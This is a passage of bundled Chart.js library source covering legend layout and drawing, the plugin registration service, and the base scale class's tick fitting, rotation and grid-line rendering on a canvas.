afterBuildLabels: noop,
//
beforeFit: noop,
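// Compute the legend's minSize: horizontal legends wrap items into lines across the width,
// vertical legends stack items into columns down the height.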
fit: function () {
var me = this;
var opts = me.options;
var labelOpts = opts.labels;
var display = opts.display;
var ctx = me.ctx;
var globalDefault = Chart.defaults.global,
itemOrDefault = helpers.getValueOrDefault,
fontSize = itemOrDefault(labelOpts.fontSize, globalDefault.defaultFontSize),
fontStyle = itemOrDefault(labelOpts.fontStyle, globalDefault.defaultFontStyle),
fontFamily = itemOrDefault(labelOpts.fontFamily, globalDefault.defaultFontFamily),
labelFont = helpers.fontString(fontSize, fontStyle, fontFamily);
// Reset hit boxes
var hitboxes = me.legendHitBoxes = [];
var minSize = me.minSize;
var isHorizontal = me.isHorizontal();
if (isHorizontal) {
minSize.width = me.maxWidth; // fill all the width
minSize.height = display ? 10 : 0;
} else {
minSize.width = display ? 10 : 0;
minSize.height = me.maxHeight; // fill all the height
}
// Increase sizes here
if (display) {
ctx.font = labelFont;
if (isHorizontal) {
// Labels
// Width of each line of legend boxes. Labels wrap onto multiple lines when there are too many to fit on one
var lineWidths = me.lineWidths = [0];
var totalHeight = me.legendItems.length ? fontSize + (labelOpts.padding) : 0;
ctx.textAlign = 'left';
ctx.textBaseline = 'top';
helpers.each(me.legendItems, function (legendItem, i) {
var boxWidth = getBoxWidth(labelOpts, fontSize);
var width = boxWidth + (fontSize / 2) + ctx.measureText(legendItem.text).width;
if (lineWidths[lineWidths.length - 1] + width + labelOpts.padding >= me.width) {
totalHeight += fontSize + (labelOpts.padding);
lineWidths[lineWidths.length] = me.left;
}
// Store the hitbox width and height here. Final position will be updated in `draw`
hitboxes[i] = {
left: 0,
top: 0,
width: width,
height: fontSize
};
lineWidths[lineWidths.length - 1] += width + labelOpts.padding;
});
minSize.height += totalHeight;
} else {
var vPadding = labelOpts.padding;
var columnWidths = me.columnWidths = [];
var totalWidth = labelOpts.padding;
var currentColWidth = 0;
var currentColHeight = 0;
var itemHeight = fontSize + vPadding;
helpers.each(me.legendItems, function (legendItem, i) {
var boxWidth = getBoxWidth(labelOpts, fontSize);
var itemWidth = boxWidth + (fontSize / 2) + ctx.measureText(legendItem.text).width;
// If too tall, go to new column
if (currentColHeight + itemHeight > minSize.height) {
totalWidth += currentColWidth + labelOpts.padding;
columnWidths.push(currentColWidth); // previous column width
currentColWidth = 0;
currentColHeight = 0;
}
// Get max width
currentColWidth = Math.max(currentColWidth, itemWidth);
currentColHeight += itemHeight;
// Store the hitbox width and height here. Final position will be updated in `draw`
hitboxes[i] = {
left: 0,
top: 0,
width: itemWidth,
height: fontSize
};
});
totalWidth += currentColWidth;
columnWidths.push(currentColWidth);
minSize.width += totalWidth;
}
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: noop,
// Shared Methods
isHorizontal: function () {
return this.options.position === 'top' || this.options.position === 'bottom';
},
// Actually draw the legend on the canvas
draw: function () {
var me = this;
var opts = me.options;
var labelOpts = opts.labels;
var globalDefault = Chart.defaults.global,
lineDefault = globalDefault.elements.line,
legendWidth = me.width,
lineWidths = me.lineWidths;
if (opts.display) {
var ctx = me.ctx,
cursor,
itemOrDefault = helpers.getValueOrDefault,
fontColor = itemOrDefault(labelOpts.fontColor, globalDefault.defaultFontColor),
fontSize = itemOrDefault(labelOpts.fontSize, globalDefault.defaultFontSize),
fontStyle = itemOrDefault(labelOpts.fontStyle, globalDefault.defaultFontStyle),
fontFamily = itemOrDefault(labelOpts.fontFamily, globalDefault.defaultFontFamily),
labelFont = helpers.fontString(fontSize, fontStyle, fontFamily);
// Canvas setup
ctx.textAlign = 'left';
ctx.textBaseline = 'top';
ctx.lineWidth = 0.5;
ctx.strokeStyle = fontColor; // for strikethrough effect
ctx.fillStyle = fontColor; // render in correct colour
ctx.font = labelFont;
var boxWidth = getBoxWidth(labelOpts, fontSize),
hitboxes = me.legendHitBoxes;
// current position
var drawLegendBox = function (x, y, legendItem) {
if (isNaN(boxWidth) || boxWidth <= 0) {
return;
}
// Set the ctx for the box
ctx.save();
ctx.fillStyle = itemOrDefault(legendItem.fillStyle, globalDefault.defaultColor);
ctx.lineCap = itemOrDefault(legendItem.lineCap, lineDefault.borderCapStyle);
ctx.lineDashOffset = itemOrDefault(legendItem.lineDashOffset, lineDefault.borderDashOffset);
ctx.lineJoin = itemOrDefault(legendItem.lineJoin, lineDefault.borderJoinStyle);
ctx.lineWidth = itemOrDefault(legendItem.lineWidth, lineDefault.borderWidth);
ctx.strokeStyle = itemOrDefault(legendItem.strokeStyle, globalDefault.defaultColor);
var isLineWidthZero = (itemOrDefault(legendItem.lineWidth, lineDefault.borderWidth) === 0);
if (ctx.setLineDash) {
// IE 9 and 10 do not support line dash
ctx.setLineDash(itemOrDefault(legendItem.lineDash, lineDefault.borderDash));
}
if (opts.labels && opts.labels.usePointStyle) {
// Recalculate x and y for drawPoint() because it expects
// x and y to be center of figure (instead of top left)
var radius = fontSize * Math.SQRT2 / 2;
var offSet = radius / Math.SQRT2;
var centerX = x + offSet;
var centerY = y + offSet;
// Draw pointStyle as legend symbol
Chart.canvasHelpers.drawPoint(ctx, legendItem.pointStyle, radius, centerX, centerY);
} else {
// Draw box as legend symbol
if (!isLineWidthZero) {
ctx.strokeRect(x, y, boxWidth, fontSize);
}
ctx.fillRect(x, y, boxWidth, fontSize);
}
ctx.restore();
};
var fillText = function (x, y, legendItem, textWidth) {
ctx.fillText(legendItem.text, boxWidth + (fontSize / 2) + x, y);
if (legendItem.hidden) {
// Strikethrough the text if hidden
ctx.beginPath();
ctx.lineWidth = 2;
ctx.moveTo(boxWidth + (fontSize / 2) + x, y + (fontSize / 2));
ctx.lineTo(boxWidth + (fontSize / 2) + x + textWidth, y + (fontSize / 2));
ctx.stroke();
}
};
// Horizontal
var isHorizontal = me.isHorizontal();
if (isHorizontal) {
cursor = {
x: me.left + ((legendWidth - lineWidths[0]) / 2),
y: me.top + labelOpts.padding,
line: 0
};
} else {
cursor = {
x: me.left + labelOpts.padding,
y: me.top + labelOpts.padding,
line: 0
};
}
var itemHeight = fontSize + labelOpts.padding;
helpers.each(me.legendItems, function (legendItem, i) {
var textWidth = ctx.measureText(legendItem.text).width,
width = boxWidth + (fontSize / 2) + textWidth,
x = cursor.x,
y = cursor.y;
if (isHorizontal) {
if (x + width >= legendWidth) {
y = cursor.y += itemHeight;
cursor.line++;
x = cursor.x = me.left + ((legendWidth - lineWidths[cursor.line]) / 2);
}
} else if (y + itemHeight > me.bottom) {
x = cursor.x = x + me.columnWidths[cursor.line] + labelOpts.padding;
y = cursor.y = me.top;
cursor.line++;
}
drawLegendBox(x, y, legendItem);
hitboxes[i].left = x;
hitboxes[i].top = y;
// Fill the actual label
fillText(x, y, legendItem, textWidth);
if (isHorizontal) {
cursor.x += width + (labelOpts.padding);
} else {
cursor.y += itemHeight;
}
});
}
},
/**
* Handle an event
* @private
* @param e {Event} the event to handle
* @return {Boolean} true if a change occurred
*/
handleEvent: function (e) {
var me = this;
var opts = me.options;
var type = e.type === 'mouseup' ? 'click' : e.type;
var changed = false;
if (type === 'mousemove') {
if (!opts.onHover) {
return;
}
} else if (type === 'click') {
if (!opts.onClick) {
return;
}
} else {
return;
}
var position = helpers.getRelativePosition(e, me.chart.chart),
x = position.x,
y = position.y;
if (x >= me.left && x <= me.right && y >= me.top && y <= me.bottom) {
// See if we are touching one of the dataset boxes
var lh = me.legendHitBoxes;
for (var i = 0; i < lh.length; ++i) {
var hitBox = lh[i];
if (x >= hitBox.left && x <= hitBox.left + hitBox.width && y >= hitBox.top && y <= hitBox.top + hitBox.height) {
// Touching an element
if (type === 'click') {
opts.onClick.call(me, e, me.legendItems[i]);
changed = true;
break;
} else if (type === 'mousemove') {
opts.onHover.call(me, e, me.legendItems[i]);
changed = true;
break;
}
}
}
}
return changed;
}
});
// Register the legend plugin
Chart.plugins.register({
beforeInit: function (chartInstance) {
var opts = chartInstance.options;
var legendOpts = opts.legend;
if (legendOpts) {
chartInstance.legend = new Chart.Legend({
ctx: chartInstance.chart.ctx,
options: legendOpts,
chart: chartInstance
});
Chart.layoutService.addBox(chartInstance, chartInstance.legend);
}
}
});
};
}, {}], 31: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var noop = Chart.helpers.noop;
/**
* The plugin service singleton
* @namespace Chart.plugins
* @since 2.1.0
*/
Chart.plugins = {
_plugins: [],
/**
* Registers the given plugin(s) if not already registered.
* @param {Array|Object} plugins plugin instance(s).
*/
register: function (plugins) {
var p = this._plugins;
([]).concat(plugins).forEach(function (plugin) {
if (p.indexOf(plugin) === -1) {
p.push(plugin);
}
});
},
/**
* Unregisters the given plugin(s) only if registered.
* @param {Array|Object} plugins plugin instance(s).
*/
unregister: function (plugins) {
var p = this._plugins;
([]).concat(plugins).forEach(function (plugin) {
var idx = p.indexOf(plugin);
if (idx !== -1) {
p.splice(idx, 1);
}
});
},
/**
* Remove all registered plugins.
* @since 2.1.5
*/
clear: function () {
this._plugins = [];
},
/**
* Returns the number of registered plugins.
* @returns {Number}
* @since 2.1.5
*/
count: function () {
return this._plugins.length;
},
/**
* Returns all registered plugin instances.
* @returns {Array} array of plugin objects.
* @since 2.1.5
*/
getAll: function () {
return this._plugins;
},
/**
* Calls registered plugins on the specified extension, with the given args. This
* method returns as soon as a plugin explicitly returns false. The
* returned value can be used, for instance, to interrupt the current action.
* @param {String} extension the name of the plugin method to call (e.g. 'beforeUpdate').
* @param {Array} [args] extra arguments to apply to the extension call.
* @returns {Boolean} false if any of the plugins return false, else returns true.
*/
notify: function (extension, args) {
var plugins = this._plugins;
var ilen = plugins.length;
var i, plugin;
for (i = 0; i < ilen; ++i) {
plugin = plugins[i];
if (typeof plugin[extension] === 'function') {
if (plugin[extension].apply(plugin, args || []) === false) {
return false;
}
}
}
return true;
}
};
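// Example (illustrative sketch): registering a simple plugin with this service.
// Any hook listed on Chart.PluginBase below may be implemented; a hook that
// explicitly returns false can interrupt the current action via notify().
//
// Chart.plugins.register({
//     afterDraw: function (chartInstance) {
//         var ctx = chartInstance.chart.ctx;
//         ctx.save();
//         ctx.fillText('draft', 10, 10); // stamp a watermark after every draw
//         ctx.restore();
//     }
// });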
/**
* Plugin extension methods.
* @interface Chart.PluginBase
* @since 2.1.0
*/
Chart.PluginBase = Chart.Element.extend({
// Called at start of chart init
beforeInit: noop,
// Called at end of chart init
afterInit: noop,
// Called at start of update
beforeUpdate: noop,
// Called at end of update
afterUpdate: noop,
// Called at start of draw
beforeDraw: noop,
// Called at end of draw
afterDraw: noop,
// Called during destroy
destroy: noop
});
/**
* Provided for backward compatibility, use Chart.plugins instead
* @namespace Chart.pluginService
* @deprecated since version 2.1.5
* @todo remove me at version 3
*/
Chart.pluginService = Chart.plugins;
};
}, {}], 32: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.scale = {
display: true,
position: 'left',
// grid line settings
gridLines: {
display: true,
color: 'rgba(0, 0, 0, 0.1)',
lineWidth: 1,
drawBorder: true,
drawOnChartArea: true,
drawTicks: true,
tickMarkLength: 10,
zeroLineWidth: 1,
zeroLineColor: 'rgba(0,0,0,0.25)',
offsetGridLines: false,
borderDash: [],
borderDashOffset: 0.0
},
// scale label
scaleLabel: {
// actual label
labelString: '',
// display property
display: false
},
// label settings
ticks: {
beginAtZero: false,
minRotation: 0,
maxRotation: 50,
mirror: false,
padding: 10,
reverse: false,
display: true,
autoSkip: true,
autoSkipPadding: 0,
labelOffset: 0,
// We pass through arrays to be rendered as multiline labels; everything else is converted to a string here.
callback: Chart.Ticks.formatters.values
}
};
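// Example (illustrative sketch): per-axis options in a chart config are merged
// over these defaults, e.g.:
//
// options: {
//     scales: {
//         yAxes: [{
//             ticks: { beginAtZero: true, maxRotation: 0 },
//             gridLines: { color: 'rgba(0, 0, 0, 0.05)' },
//             scaleLabel: { display: true, labelString: 'Value' }
//         }]
//     }
// }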
Chart.Scale = Chart.Element.extend({
// These methods are ordered by lifecycle. Utilities then follow.
// Any function defined here is inherited by all scale types.
// Any function can be extended by the scale type
beforeUpdate: function () {
helpers.callCallback(this.options.beforeUpdate, [this]);
},
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = helpers.extend({
left: 0,
right: 0,
top: 0,
bottom: 0
}, margins);
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Data min/max
me.beforeDataLimits();
me.determineDataLimits();
me.afterDataLimits();
// Ticks
me.beforeBuildTicks();
me.buildTicks();
me.afterBuildTicks();
me.beforeTickToLabelConversion();
me.convertTicksToLabels();
me.afterTickToLabelConversion();
// Tick Rotation
me.beforeCalculateTickRotation();
me.calculateTickRotation();
me.afterCalculateTickRotation();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: function () {
helpers.callCallback(this.options.afterUpdate, [this]);
},
//
beforeSetDimensions: function () {
helpers.callCallback(this.options.beforeSetDimensions, [this]);
},
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
},
afterSetDimensions: function () {
helpers.callCallback(this.options.afterSetDimensions, [this]);
},
// Data limits
beforeDataLimits: function () {
helpers.callCallback(this.options.beforeDataLimits, [this]);
},
determineDataLimits: helpers.noop,
afterDataLimits: function () {
helpers.callCallback(this.options.afterDataLimits, [this]);
},
//
beforeBuildTicks: function () {
helpers.callCallback(this.options.beforeBuildTicks, [this]);
},
buildTicks: helpers.noop,
afterBuildTicks: function () {
helpers.callCallback(this.options.afterBuildTicks, [this]);
},
beforeTickToLabelConversion: function () {
helpers.callCallback(this.options.beforeTickToLabelConversion, [this]);
},
convertTicksToLabels: function () {
var me = this;
// Convert ticks to strings
var tickOpts = me.options.ticks;
me.ticks = me.ticks.map(tickOpts.userCallback || tickOpts.callback);
},
afterTickToLabelConversion: function () {
helpers.callCallback(this.options.afterTickToLabelConversion, [this]);
},
//
beforeCalculateTickRotation: function () {
helpers.callCallback(this.options.beforeCalculateTickRotation, [this]);
},
calculateTickRotation: function () {
var me = this;
var context = me.ctx;
var globalDefaults = Chart.defaults.global;
var optionTicks = me.options.ticks;
// Get the width of each grid by calculating the difference
// between x offsets between 0 and 1.
var tickFontSize = helpers.getValueOrDefault(optionTicks.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(optionTicks.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(optionTicks.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
context.font = tickLabelFont;
var firstWidth = context.measureText(me.ticks[0]).width;
var lastWidth = context.measureText(me.ticks[me.ticks.length - 1]).width;
var firstRotated;
me.labelRotation = optionTicks.minRotation || 0;
me.paddingRight = 0;
me.paddingLeft = 0;
if (me.options.display) {
if (me.isHorizontal()) {
me.paddingRight = lastWidth / 2 + 3;
me.paddingLeft = firstWidth / 2 + 3;
if (!me.longestTextCache) {
me.longestTextCache = {};
}
var originalLabelWidth = helpers.longestText(context, tickLabelFont, me.ticks, me.longestTextCache);
var labelWidth = originalLabelWidth;
var cosRotation;
var sinRotation;
// Allow 3 pixels x2 padding either side for label readability
// only the index matters for a dataset scale, but we want a consistent interface between scales
var tickWidth = me.getPixelForTick(1) - me.getPixelForTick(0) - 6;
// Max label rotation can be set or default to 90 - also act as a loop counter
while (labelWidth > tickWidth && me.labelRotation < optionTicks.maxRotation) {
cosRotation = Math.cos(helpers.toRadians(me.labelRotation));
sinRotation = Math.sin(helpers.toRadians(me.labelRotation));
firstRotated = cosRotation * firstWidth;
// We're right aligning the text now.
if (firstRotated + tickFontSize / 2 > me.yLabelWidth) {
me.paddingLeft = firstRotated + tickFontSize / 2;
}
me.paddingRight = tickFontSize / 2;
if (sinRotation * originalLabelWidth > me.maxHeight) {
// go back one step
me.labelRotation--;
break;
}
me.labelRotation++;
labelWidth = cosRotation * originalLabelWidth;
}
}
}
if (me.margins) {
me.paddingLeft = Math.max(me.paddingLeft - me.margins.left, 0);
me.paddingRight = Math.max(me.paddingRight - me.margins.right, 0);
}
},
afterCalculateTickRotation: function () {
helpers.callCallback(this.options.afterCalculateTickRotation, [this]);
},
//
beforeFit: function () {
helpers.callCallback(this.options.beforeFit, [this]);
},
fit: function () {
var me = this;
// Reset
var minSize = me.minSize = {
width: 0,
height: 0
};
var opts = me.options;
var globalDefaults = Chart.defaults.global;
var tickOpts = opts.ticks;
var scaleLabelOpts = opts.scaleLabel;
var gridLineOpts = opts.gridLines;
var display = opts.display;
var isHorizontal = me.isHorizontal();
var tickFontSize = helpers.getValueOrDefault(tickOpts.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(tickOpts.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(tickOpts.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
var scaleLabelFontSize = helpers.getValueOrDefault(scaleLabelOpts.fontSize, globalDefaults.defaultFontSize);
var tickMarkLength = opts.gridLines.tickMarkLength;
// Width
if (isHorizontal) {
// subtract the margins to line up with the chartArea if we are a full width scale
minSize.width = me.isFullWidth() ? me.maxWidth - me.margins.left - me.margins.right : me.maxWidth;
} else {
minSize.width = display && gridLineOpts.drawTicks ? tickMarkLength : 0;
}
// height
if (isHorizontal) {
minSize.height = display && gridLineOpts.drawTicks ? tickMarkLength : 0;
} else {
minSize.height = me.maxHeight; // fill all the height
}
// Are we showing a title for the scale?
if (scaleLabelOpts.display && display) {
if (isHorizontal) {
minSize.height += (scaleLabelFontSize * 1.5);
} else {
minSize.width += (scaleLabelFontSize * 1.5);
}
}
if (tickOpts.display && display) {
// Don't bother fitting the ticks if we are not showing them
if (!me.longestTextCache) {
me.longestTextCache = {};
}
var largestTextWidth = helpers.longestText(me.ctx, tickLabelFont, me.ticks, me.longestTextCache);
var tallestLabelHeightInLines = helpers.numberOfLabelLines(me.ticks);
var lineSpace = tickFontSize * 0.5;
if (isHorizontal) {
// A horizontal axis is more constrained by the height.
me.longestLabelWidth = largestTextWidth;
// TODO - improve this calculation
var labelHeight = (Math.sin(helpers.toRadians(me.labelRotation)) * me.longestLabelWidth) + (tickFontSize * tallestLabelHeightInLines) + (lineSpace * tallestLabelHeightInLines);
minSize.height = Math.min(me.maxHeight, minSize.height + labelHeight);
me.ctx.font = tickLabelFont;
var firstLabelWidth = me.ctx.measureText(me.ticks[0]).width;
var lastLabelWidth = me.ctx.measureText(me.ticks[me.ticks.length - 1]).width;
// Ensure that our ticks are always inside the canvas. When rotated, ticks are right aligned which means that the right padding is dominated
// by the font height
var cosRotation = Math.cos(helpers.toRadians(me.labelRotation));
var sinRotation = Math.sin(helpers.toRadians(me.labelRotation));
me.paddingLeft = me.labelRotation !== 0 ? (cosRotation * firstLabelWidth) + 3 : firstLabelWidth / 2 + 3; // add 3 px to move away from canvas edges
me.paddingRight = me.labelRotation !== 0 ? (sinRotation * (tickFontSize / 2)) + 3 : lastLabelWidth / 2 + 3; // when rotated
} else {
// A vertical axis is more constrained by the width. Labels are the dominant factor here, so get that length first
var maxLabelWidth = me.maxWidth - minSize.width;
// Account for padding
var mirror = tickOpts.mirror;
if (!mirror) {
largestTextWidth += me.options.ticks.padding;
} else {
// If mirrored text is on the inside so don't expand
largestTextWidth = 0;
}
if (largestTextWidth < maxLabelWidth) {
// We don't need all the room
minSize.width += largestTextWidth;
} else {
// Expand to max size
minSize.width = me.maxWidth;
}
me.paddingTop = tickFontSize / 2;
me.paddingBottom = tickFontSize / 2;
}
}
if (me.margins) {
me.paddingLeft = Math.max(me.paddingLeft - me.margins.left, 0);
me.paddingTop = Math.max(me.paddingTop - me.margins.top, 0);
me.paddingRight = Math.max(me.paddingRight - me.margins.right, 0);
me.paddingBottom = Math.max(me.paddingBottom - me.margins.bottom, 0);
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: function () {
helpers.callCallback(this.options.afterFit, [this]);
},
// Shared Methods
isHorizontal: function () {
return this.options.position === 'top' || this.options.position === 'bottom';
},
isFullWidth: function () {
return (this.options.fullWidth);
},
// Get the correct value. Returns NaN for bad inputs. If the value is an object, pick its x or y based on whether we are horizontal or not
getRightValue: function (rawValue) {
// Null and undefined values first
if (rawValue === null || typeof(rawValue) === 'undefined') {
return NaN;
}
// isNaN(object) returns true, so explicitly check that the value is a number; discard infinite values
if (typeof(rawValue) === 'number' && !isFinite(rawValue)) {
return NaN;
}
// If it is in fact an object, dive in one more level
if (typeof(rawValue) === 'object') {
if ((rawValue instanceof Date) || (rawValue.isValid)) {
return rawValue;
}
return this.getRightValue(this.isHorizontal() ? rawValue.x : rawValue.y);
}
// Value is good, return it
return rawValue;
},
// Used to get the value to display in the tooltip for the data at the given index
// function getLabelForIndex(index, datasetIndex)
getLabelForIndex: helpers.noop,
// Used to get data value locations. Value can either be an index or a numerical value
getPixelForValue: helpers.noop,
// Used to get the data value from a given pixel. This is the inverse of getPixelForValue
getValueForPixel: helpers.noop,
// Used for tick location; should return the pixel position of the tick at the given index
getPixelForTick: function (index, includeOffset) {
var me = this;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var tickWidth = innerWidth / Math.max((me.ticks.length - ((me.options.gridLines.offsetGridLines) ? 0 : 1)), 1);
var pixel = (tickWidth * index) + me.paddingLeft;
if (includeOffset) {
pixel += tickWidth / 2;
}
var finalVal = me.left + Math.round(pixel);
finalVal += me.isFullWidth() ? me.margins.left : 0;
return finalVal;
}
var innerHeight = me.height - (me.paddingTop + me.paddingBottom);
return me.top + (index * (innerHeight / (me.ticks.length - 1)));
},
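// For example, on a 300px-wide horizontal axis with no padding, 4 ticks and
// offsetGridLines disabled: tickWidth = 300 / 3, so tick index 2 maps to left + 200.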
// Utility for getting the pixel location of a percentage of scale
getPixelForDecimal: function (decimal /* , includeOffset*/) {
var me = this;
if (me.isHorizontal()) {
var innerWidth = me.width - (me.paddingLeft + me.paddingRight);
var valueOffset = (innerWidth * decimal) + me.paddingLeft;
var finalVal = me.left + Math.round(valueOffset);
finalVal += me.isFullWidth() ? me.margins.left : 0;
return finalVal;
}
return me.top + (decimal * me.height);
},
getBasePixel: function () {
var me = this;
var min = me.min;
var max = me.max;
return me.getPixelForValue(
me.beginAtZero ? 0 :
min < 0 && max < 0 ? max :
min > 0 && max > 0 ? min :
0);
},
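// For example, min 2 / max 10 bases the scale at min (2); min -10 / max -2 bases
// it at max (-2); a range spanning zero (or beginAtZero) bases it at 0.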
// Actually draw the scale on the canvas
// @param {rectangle} chartArea : the area of the chart to draw full grid lines on
draw: function (chartArea) {
var me = this;
var options = me.options;
if (!options.display) {
return;
}
var context = me.ctx;
var globalDefaults = Chart.defaults.global;
var optionTicks = options.ticks;
var gridLines = options.gridLines;
var scaleLabel = options.scaleLabel;
var isRotated = me.labelRotation !== 0;
var skipRatio;
var useAutoskipper = optionTicks.autoSkip;
var isHorizontal = me.isHorizontal();
// figure out the maximum number of gridlines to show
var maxTicks;
if (optionTicks.maxTicksLimit) {
maxTicks = optionTicks.maxTicksLimit;
}
var tickFontColor = helpers.getValueOrDefault(optionTicks.fontColor, globalDefaults.defaultFontColor);
var tickFontSize = helpers.getValueOrDefault(optionTicks.fontSize, globalDefaults.defaultFontSize);
var tickFontStyle = helpers.getValueOrDefault(optionTicks.fontStyle, globalDefaults.defaultFontStyle);
var tickFontFamily = helpers.getValueOrDefault(optionTicks.fontFamily, globalDefaults.defaultFontFamily);
var tickLabelFont = helpers.fontString(tickFontSize, tickFontStyle, tickFontFamily);
var tl = gridLines.tickMarkLength;
var borderDash = helpers.getValueOrDefault(gridLines.borderDash, globalDefaults.borderDash);
var borderDashOffset = helpers.getValueOrDefault(gridLines.borderDashOffset, globalDefaults.borderDashOffset);
var scaleLabelFontColor = helpers.getValueOrDefault(scaleLabel.fontColor, globalDefaults.defaultFontColor);
var scaleLabelFontSize = helpers.getValueOrDefault(scaleLabel.fontSize, globalDefaults.defaultFontSize);
var scaleLabelFontStyle = helpers.getValueOrDefault(scaleLabel.fontStyle, globalDefaults.defaultFontStyle);
var scaleLabelFontFamily = helpers.getValueOrDefault(scaleLabel.fontFamily, globalDefaults.defaultFontFamily);
var scaleLabelFont = helpers.fontString(scaleLabelFontSize, scaleLabelFontStyle, scaleLabelFontFamily);
var labelRotationRadians = helpers.toRadians(me.labelRotation);
var cosRotation = Math.cos(labelRotationRadians);
var longestRotatedLabel = me.longestLabelWidth * cosRotation;
// Make sure we draw text in the correct color and font
context.fillStyle = tickFontColor;
var itemsToDraw = [];
if (isHorizontal) {
skipRatio = false;
// Only calculate the skip ratio with the half width of longestRotatedLabel if we got an actual rotation
// See #2584
if (isRotated) {
longestRotatedLabel /= 2;
}
if ((longestRotatedLabel + optionTicks.autoSkipPadding) * me.ticks.length > (me.width - (me.paddingLeft + me.paddingRight))) {
skipRatio = 1 + Math.floor(((longestRotatedLabel + optionTicks.autoSkipPadding) * me.ticks.length) / (me.width - (me.paddingLeft + me.paddingRight)));
}
// if they defined a max number of optionTicks,
// increase skipRatio until that number is met
if (maxTicks && me.ticks.length > maxTicks) {
while (!skipRatio || me.ticks.length / (skipRatio || 1) > maxTicks) {
if (!skipRatio) {
skipRatio = 1;
}
skipRatio += 1;
}
}
if (!useAutoskipper) {
skipRatio = false;
}
}
var xTickStart = options.position === 'right' ? me.left : me.right - tl;
var xTickEnd = options.position === 'right' ? me.left + tl : me.right;
var yTickStart = options.position === 'bottom' ? me.top : me.bottom - tl;
var yTickEnd = options.position === 'bottom' ? me.top + tl : me.bottom;
helpers.each(me.ticks, function (label, index) {
// If the callback returned a null or undefined value, do not draw this line
if (label === undefined || label === null) {
return;
}
var isLastTick = me.ticks.length === index + 1;
// Since we always show the last tick, we may need to hide the last tick the skip pattern would otherwise show just before it
var shouldSkip = (skipRatio > 1 && index % skipRatio > 0) || (index % skipRatio === 0 && index + skipRatio >= me.ticks.length);
if (shouldSkip && !isLastTick || (label === undefined || label === null)) {
return;
}
var lineWidth, lineColor;
if (index === (typeof me.zeroLineIndex !== 'undefined' ? me.zeroLineIndex : 0)) {
// Draw the first index specially
lineWidth = gridLines.zeroLineWidth;
lineColor = gridLines.zeroLineColor;
} else {
lineWidth = helpers.getValueAtIndexOrDefault(gridLines.lineWidth, index);
lineColor = helpers.getValueAtIndexOrDefault(gridLines.color, index);
}
// Common properties
var tx1, ty1, tx2, ty2, x1, y1, x2, y2, labelX, labelY;
var textAlign = 'middle';
var textBaseline = 'middle';
if (isHorizontal) {
if (!isRotated) {
textBaseline = options.position === 'top' ? 'bottom' : 'top';
}
textAlign = isRotated ? 'right' : 'center';
var xLineValue = me.getPixelForTick(index) + helpers.aliasPixel(lineWidth); // x values for grid lines
labelX = me.getPixelForTick(index, gridLines.offsetGridLines) + optionTicks.labelOffset; // x values for ticks (need to consider the labelOffset option)
labelY = (isRotated) ? me.top + 12 : options.position === 'top' ? me.bottom - tl : me.top + tl;
tx1 = tx2 = x1 = x2 = xLineValue;
ty1 = yTickStart;
ty2 = yTickEnd;
y1 = chartArea.top;
y2 = chartArea.bottom;
} else {
if (options.position === 'left') {
if (optionTicks.mirror) {
labelX = me.right + optionTicks.padding;
textAlign = 'left';
} else {
labelX = me.right - optionTicks.padding;
textAlign = 'right';
}
// right side
} else if (optionTicks.mirror) {
labelX = me.left - optionTicks.padding;
textAlign = 'right';
} else {
labelX = me.left + optionTicks.padding;
textAlign = 'left';
}
var yLineValue = me.getPixelForTick(index); // y values for grid lines
yLineValue += helpers.aliasPixel(lineWidth);
labelY = me.getPixelForTick(index, gridLines.offsetGridLines);
tx1 = xTickStart;
tx2 = xTickEnd;
x1 = chartArea.left;
x2 = chartArea.right;
ty1 = ty2 = y1 = y2 = yLineValue;
}
itemsToDraw.push({
tx1: tx1,
ty1: ty1,
tx2: tx2,
ty2: ty2,
x1: x1,
y1: y1,
x2: x2,
y2: y2,
labelX: labelX,
labelY: labelY,
glWidth: lineWidth,
glColor: lineColor,
glBorderDash: borderDash,
glBorderDashOffset: borderDashOffset,
rotation: -1 * labelRotationRadians,
label: label,
textBaseline: textBaseline,
textAlign: textAlign
});
});
// Draw all of the tick labels, tick marks, and grid lines at the correct places
helpers.each(itemsToDraw, function (itemToDraw) {
if (gridLines.display) {
context.save();
context.lineWidth = itemToDraw.glWidth;
context.strokeStyle = itemToDraw.glColor;
if (context.setLineDash) {
context.setLineDash(itemToDraw.glBorderDash);
context.lineDashOffset = itemToDraw.glBorderDashOffset;
}
context.beginPath();
if (gridLines.drawTicks) {
context.moveTo(itemToDraw.tx1, itemToDraw.ty1);
context.lineTo(itemToDraw.tx2, itemToDraw.ty2);
}
if (gridLines.drawOnChartArea) {
context.moveTo(itemToDraw.x1, itemToDraw.y1);
context.lineTo(itemToDraw.x2, itemToDraw.y2);
}
context.stroke();
context.restore();
}
if (optionTicks.display) {
context.save();
context.translate(itemToDraw.labelX, itemToDraw.labelY);
context.rotate(itemToDraw.rotation);
context.font = tickLabelFont;
context.textBaseline = itemToDraw.textBaseline;
context.textAlign = itemToDraw.textAlign;
var label = itemToDraw.label;
